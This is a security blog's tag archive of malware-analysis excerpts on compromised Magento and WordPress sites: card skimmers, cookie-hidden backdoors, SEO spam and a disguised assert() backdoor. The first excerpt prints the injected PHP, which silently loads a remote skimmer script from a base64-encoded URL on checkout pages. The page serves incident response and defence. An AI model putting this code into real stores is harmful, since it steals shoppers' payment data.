Tag Archives: Malware

Magento PHP Injection Loads JavaScript Skimmer

A Magento website owner was concerned about malware and reached out to our team for assistance. Upon investigation, we found the website contained a PHP injection in one of the Magento files: ./app/code/core/Mage/Payment/Model/Method/Cc.php … if ($_SERVER[“REQUEST_METHOD”] === “GET”){ if (strpos($_SERVER[“REQUEST_URI”], “/onestepcheckout/index/”) !== false){ if(!isset($_COOKIE[“adminhtml”])){ echo file_get_contents(base64_decode(“aHR0cHM6Ly91bmRlcnNjb3JlZndbLl1jb20vc3JjL2tyZWEuanM=”)); } } } To make it more difficult to More Info »

Evaluating Cookies to Hide Backdoors

Identifying website backdoors is not always an easy task. Since a backdoors primary function is to conceal itself while providing unauthorized access, they are often developed using a variety of techniques that can make it challenging to detect. For example, an attacker can inject a single line of code containing less than 130 characters into More Info »

Bogus CSS Injection Leads to Stolen Credit Card Details

A client recently reported their customers were receiving antivirus warnings when trying to access and purchase products from a Magento ecommerce website. This is almost always a telltale sign that something is amiss, and so I began my investigation. Malware in Database Tables As is pretty common with Magento credit card swiper investigations, my initial More Info »

SEO Spam Links in Nulled Plugins

It’s not unusual to see website owners running things on a budget. Choosing a safe and reliable hosting company, buying a nice domain name, boosting posts on social media, and ranking on search engines — all this costs a lot of money. At the end of the day, some site owners may even choose to More Info »

Why You Should Monitor Your Website

In an effort to maintain unauthorized access or profit off a website’s environment long after an initial compromise, attackers commonly leverage a variety of different techniques and tactics. These techniques range from adding backdoors, stealing sensitive data, redirecting the site to other third-party resources, or even injecting specially crafted links to give their own sites More Info »

Fake WordPress Functions Conceal assert() Backdoor

A few weeks ago, I was manually inspecting some files on a compromised website. While checking on a specific WooCommerce file, I noticed something interesting. Among 246 other lines, this very specific part stood out to me: $config = wp_dbase_config_init(‘_as_sert’); For those readers familiar with PHP functions commonly misused by hackers, you may have already More Info »